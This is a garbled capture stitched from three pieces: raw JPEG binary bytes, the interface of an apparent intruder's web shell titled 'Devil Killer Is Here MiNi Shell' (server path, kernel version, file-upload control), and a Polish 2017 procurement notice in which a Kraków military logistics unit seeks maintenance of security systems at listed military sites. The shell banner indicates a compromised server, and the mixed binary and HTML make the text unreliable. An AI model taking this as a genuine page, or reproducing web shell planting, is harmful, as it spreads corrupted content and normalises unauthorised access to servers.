JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170131/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170131/17077-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://' target='_blank'>http://</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 17077 - 2017
              z dnia 2017-01-31 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Kraków: Przegląd, konserwacja oraz serwis w przypadkach awarii, systemów zabezpieczenia technicznego w kompleksach wojskowych będących na zaopatrzeniu 35 WOG w roku 2017<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>35 Wojskowy Oddział Gospodarczy, krajowy numer identyfikacyjny
              12150664500000, ul.
              Rząska, ul. Krakowska 
              2,
              30901  
              Kraków, woj.
              małopolskie, państwo
              Polska, tel.
              +48 261135116, +48 261133017, e-mail
              szpk@35wog.mil.pl, faks
              +48 261135059, +48 261135165.
              <br />
              Adres strony internetowej (URL): http://35wog.wp.mil.pl/pl/index.html<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Jednostka Budżetowa</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  tak
                <br />35 Wojskowy Oddział Gospodarczy ul. Krakowska 2  30-199 RZĄSKA</div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Wnioski należny składać wyłącznie w formie pisemnej.  Składanie wniosków odbywa się za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012 r.  Prawo pocztowe (Dz. U. poz. 1529 oraz z 2015 r. poz. 1830), osobiście lub za pośrednictwem posłańca.<br />
                Adres:
                <br />35 Wojskowy Oddział Gospodarczy ul. Krakowska 2 30-199 RZĄSKA</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Przegląd, konserwacja oraz serwis w przypadkach awarii, systemów zabezpieczenia technicznego w kompleksach wojskowych będących na zaopatrzeniu 35 WOG w roku 2017<br /><b>Numer referencyjny: </b>Sygn. 4/INFR/17.<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia  jest świadczenie usług w zakresie wykonania przeglądu, konserwacji oraz serwis w przypadku awarii systemów zabezpieczeń technicznych, w celu utrzymania ich w stałej sprawności technicznej w obiektach wojskowych będących na zaopatrzeniu 35 Wojskowego Oddziału Gospodarczego w roku 2017. Postępowanie jest prowadzone w trybie przetargu ograniczonego.
3.2. Zamawiający podzielił przedmiot zamówienia na dwie części.

	Część nr 1: Świadczenie usług w zakresie wykonania przeglądu, konserwacji oraz serwis            w przypadku awarii systemów zabezpieczeń technicznych,  w celu utrzymania ich w stałej sprawności technicznej w niżej wymienionych obiektach wojskowych będących na zaopatrzeniu 35 WOG
1) w Krakowie przy ulicach:
	Wrocławska nr 21;
	Głowackiego nr 11;
	Zyblikiewicza nr 1; 
	Mogilska nr 85;
	Rydla nr 19; 
	Odrowąża nr 7; 
	Montelupich nr 3;
	Koletek nr 10;

2) Tarnów, ul. Dąbrowskiego 11, 
3) Nowy Sącz, ul. Czarnieckiego 13, 
 4) Jednostka Wojskowa Niedźwiedź  32- 090 Słomniki.

Wykaz urządzeń przeznaczonych do przeglądu i konserwacji w danych kompleksach wojskowych zostanie dołączony jako załącznik do SIWZ w II etapie postępowania.

Część nr 2: Świadczenie usług w zakresie wykonania przeglądu, konserwacji oraz serwis            w przypadku awarii systemów zabezpieczeń technicznych,  w celu utrzymania ich w stałej sprawności technicznej w niżej wymienionych obiektach wojskowych będących na zaopatrzeniu 35 WOG
1) w Krakowie przy ulicach:
	Skrzatów nr 2;
	Ułanów  nr 43; 
	Wrocławska nr 82; 
	Rakowicka nr 29, COL-DKL;
	Rakowicka nr 29, EU OHQ;
	Rakowicka nr 29, RWT;
	Rakowicka nr 29, WKT;
	Rakowicka nr 29, ZZWT;
	Rakowicka nr 22, WBE;
	Rakowicka nr 22, bud. nr 2;
	Dietla nr 30;

2) Rząska, ul. Krakowska 2, 
3) Jednostka Wojskowa Kłaj;

Wykaz urządzeń przeznaczonych do przeglądu i konserwacji w danych kompleksach wojskowych zostanie dołączony jako załącznik do SIWZ w II etapie postępowania.

3.3. Zamówienie musi być zrealizowane zgodnie z:
	Normą Obronną NO-04-A004-8:2016 część 8: Eksploatacja;
	Normą Obronną NO-04-A004-1:2016 część 1: Wymagania ogólne,
	Polską Normą PN 93/E-08390/14.    

      3.4. Konserwacja urządzeń systemów alarmowych, systemów kontroli dostępu
         i systemów telewizji dozorowej dokonana będzie dwukrotnie:

	po raz pierwszy w okresie od podpisania umowy do czerwca 2017 r.,
	po raz drugi w okresie od lipca do grudnia 2017 r.
	jednocześnie w pierwszym z przedstawionych wyżej terminów konserwacji, zleceniobiorca dokona tzw. przeglądu rocznego określonego w Normie Obronnej NO-04-A004-8:2016,
         3.5.  Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 7 do informacji.
<br /><br /><b>II.5) Główny kod CPV: </b>50700000-2<br /><b> Dodatkowe kody CPV:</b>35121700-5<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              390491.88<br />
              Waluta:
              <br /><div style="padding-left: 20px">PLN<br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                Zamówienia podobne (dot. części nr 1 i części nr 2) - Zamawiający może udzielić zamówień, o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp.  w okresie 3 lat od dnia udzielenia zamówienia podstawowego, dotychczasowemu Wykonawcy usług, zamówienia polegającego na powtórzeniu podobnych usług. Zamawiający udzieli wyżej wymienionego zamówienia na zasadach tożsamych  tj. ujętych w zamówieniu pierwotnym. Ceny jednostkowe na wykonanie usługi przedstawione przez wykonawcę  w przypadku udzielenia zamówienia na podstawie art. 67 ust. 1 pkt. 6 ustawy Pzp nie mogą być wyższe niż te zaproponowane w zamówieniu podstawowym. Zamawiający udzieli zamówienia z wolnej ręki  w przypadku kiedy Wykonawca spełni warunki udziału w postępowaniu tożsame z ujętymi w zamówieniu podstawowym oraz wykaże braki podstaw do wykluczenia. Zakres usług obejmować będzie: przegląd, konserwację i serwis systemu zabezpieczenia technicznego. Zamówienie będzie mogło być udzielone w przypadku gdy zamawiający będzie dysponował środkami finansowymi na jego realizację. Cena za wykonanie przedmiotu zamówienia zostanie ustalona podczas negocjacji na podstawie złożonej przez wykonawcę wyceny ofertowej. Kary umowne będą przewidziane  w takich samych wypadkach                    i   w wysokości nie wyższej niż w umowie zawartej  w postępowaniu na zamówienie podstawowe.
 Wartość zamówienia z art. 67 ust. 1 pkt 6 Pzp. została uwzględniona przy szacowaniu wartości zamówienia, a całkowita wartość zamówienia podobnego wynosi  25% dla każdej części zamówienia.
<br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b> Całkowita wartość zamówienia wszczętego-podstawowego wraz z wartością zamówień przewidywanych na podstawie art. 67 ust 1 pkt 6 Pzp. wynosi 390491.88 zł netto. Wartość zamówienia wszczętego- podstawowego wynosi: 312 393,50 zł netto. Wartość przewidywanych zamówień z art. 67 ust 1 pkt 6 Pzp. wynosi dla dwóch części razem: 78 098,38 zł netto.  </div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                10.1	Posiadania kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej,   o ile wynika to z odrębnych przepisów;
a) ważnej koncesji MSW/MSWiA na prowadzenie działalności gospodarczej w zakresie ochrony osób i mienia realizowanej w formie zabezpieczenia technicznego na podstawie ustawy z dnia 22.08.1997 r. O ochronie osób i mienia wydanej przez Ministra Spraw Wewnętrznych upoważniającej do realizacji zadań  w zakresie zabezpieczenia technicznego (Dz. U. z 1997 r. nr 114, poz. 740 z póź. zm.);

b) ważnego Świadectwa Bezpieczeństwa Przemysłowego III stopnia, potwierdzające zdolność do ochrony informacji niejawnych o klauzuli poufne zgodnie z art. 54, art. 55 ustawy z dnia 5 sierpnia 2010 r. o ochronie informacji niejawnych (Dz. U. z 2016 r. poz. 1167);

c) ważnego zaświadczenia o odbyciu szkolenia  w zakresie ochrony informacji niejawnych zgodnie z art. 19, art. 20 ust. 1 w związku z art. 2 pkt 14 (kierownika jednostki organizacyjnej) ustawy  z dnia 5 sierpnia 2010 r. o ochronie informacji niejawnych (Dz. U. z 2016r. poz.1167);

 d) ważnego poświadczenia bezpieczeństwa do dostępu do informacji niejawnych, zgodnie     z art. 21 ust. 1 w związku z art. 2 pkt 14 (kierownika jednostki organizacyjnej) ustawy                    z dnia 5 sierpnia 2010 r. o ochronie informacji niejawnych (Dz. U. z 2016 r. poz. 1167);

Wykonawca zobowiązany jest w celu potwierdzenia spełnienia wyżej wskazanych warunków do złożenia wraz z wnioskiem oświadczenia, o którym mowa w art. 25a ust.1 ustawy Pzp. stanowiącego załącznik nr 2 do Informacji.

Zamawiający wezwie Wykonawcę, który zajmie na podstawie kryterium selekcji miejsce od           1 do 5 do złożenia ww. dokumentów potwierdzających spełnianie powyższych warunków na zasadach określonych w art. 26 ust.2f ustawy Pzp.
<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający uzna, że Wykonawca spełnia powyższy warunek udziału w postępowaniu jeśli wykaże, że jego sytuacja ekonomiczna i finansowa pozwala na wykonanie zamówienia i będzie posiadał:
a)  informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy,                w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania wniosków  o dopuszczenie do udziału w postępowaniu na kwotę: 
	80 000,00 zł dla części nr 2.

Wykonawca zobowiązany jest w celu potwierdzenia spełnienia wyżej wskazanego warunku do złożenia wraz z wnioskiem oświadczenia, o którym mowa w art. 25a ust.1 ustawy Pzp stanowiącego załącznik nr 2 do Informacji.

Zamawiający wezwie Wykonawcę, który zajmie na podstawie kryterium selekcji miejsce od           1 do 5 do złożenia ww. dokumentu potwierdzającego spełnianie powyższego  warunku na zasadach określonych w art. 26 ust.2f ustawy Pzp.
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                10.2	Posiadania zdolności zawodowej:
a)	Zamawiający wymaga w celu potwierdzenia spełnienia warunku udziału w postępowaniu przedstawienia wykazu usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych, również wykonywanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, dla:
	części nr 1   na co najmniej jedną usługę dot. konserwacji i przeglądów systemów zabezpieczenia technicznego na kwotę co najmniej 40 000,00 zł brutto;
	części nr 2 -  na co najmniej jedną usługę dot. konserwacji i przeglądów systemów zabezpieczenia technicznego na kwotę co najmniej 60 000,00 zł brutto;
wraz z podaniem ich wartości, przedmiotu, dat wykonania                                                           i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są  referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny                            o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie Wykonawcy (zał.nr 6 do wniosku). W przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu.
W odniesieniu do nadal wykonywanych usług - część zrealizowanej faktycznie usługi musi wypełnić wymogi określone przez Zamawiającego na dzień składania wniosku.  

Wykonawca zobowiązany jest w celu potwierdzenia spełnienia wyżej wskazanego warunku do złożenia wraz z wnioskiem oświadczenia, o którym mowa w art. 25a ust.1 ustawy Pzp stanowiącego załącznik nr 2 do Informacji.

Zamawiający wezwie Wykonawcę, który zajmie na podstawie kryterium selekcji miejsce od           1 do 5 do złożenia ww. dokumentu potwierdzającego spełnianie powyższego  warunku na zasadach określonych w art. 26 ust.2f ustawy Pzp.(wzór zał. nr 8 do Informacji).

10.3	Posiadania zdolności zawodowej w zakresie dysponowania osobami 
 Wykonawca oświadczy, że dysponuje lub będzie dysponował osobami zdolnymi do realizacji zamówienia tj.:
a) co najmniej 6 pracownikami posiadającymi legitymację kwalifikowanego pracownika zabezpieczenia technicznego;
b) do realizacji przedmiotu zamówienia w części do której zachodzi konieczność dostępu do informacji niejawnych Wykonawca/ Podmiot trzeci/ Podwykonawca może wyznaczać jedynie pracowników posiadających ważne poświadczenie bezpieczeństwa do pracy na stanowiskach związanych z dostępem do informacji niejawnych  o klauzuli poufne zgodnie art. 21 ust. 1, ustawy z dnia  5 sierpnia 2010 r.  o ochronie informacji niejawnych (Dz. U. z 2016 r., poz. 1167) oraz  aktualne zaświadczenie o odbyciu szkolenia w zakresie  ochrony informacji niejawnych zgodnie z art. 19, art. 20 ust. 1, ustawy z dnia  5 sierpnia 2010 r. o ochronie informacji niejawnych (Dz. U. z 2016 r. poz. 1167).

Uwaga:
Wszystkie osoby wykonujące czynności przedmiotu zamówienia związane                                  z dostępem do informacji niejawnych, muszą być zatrudnione odpowiednio przez Wykonawcę/Podmiot trzeci/Podwykonawcę posiadającego Świadectwo Bezpieczeństwa Przemysłowego III stopnia potwierdzające zdolność do ochrony informacji niejawnych o klauzuli poufne;

Uwaga:
Wykaz pracowników (Wykaz pracowników Wykonawcy, przewidzianych do realizacji przedmiotu zamówienia, zgodny z zał. nr 9 do umowy) wraz z kserokopiami dokumentów określonych w pkt. 9 Instrukcji bezpieczeństwa przemysłowego zał. nr 8 do umowy) Wykonawca, dostarczy do Zamawiającego najpóźniej w dniu podpisania umowy w celu dołączenia do umowy.

Wykonawca zobowiązany jest w celu potwierdzenia spełnienia wyżej wskazanych warunków do złożenia wraz z wnioskiem oświadczenia, o którym mowa w art. 25a ust.1 ustawy Pzp stanowiącego załącznik nr 2 do Informacji.

<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  tak
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1.3.	W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 oraz art. 24 ust. 5 ustawy Pzp na wezwanie na podstawie art. 26 ust.2f Pzp. przez Zamawiającego należy dostarczyć:
a)	odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy;
b)	zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
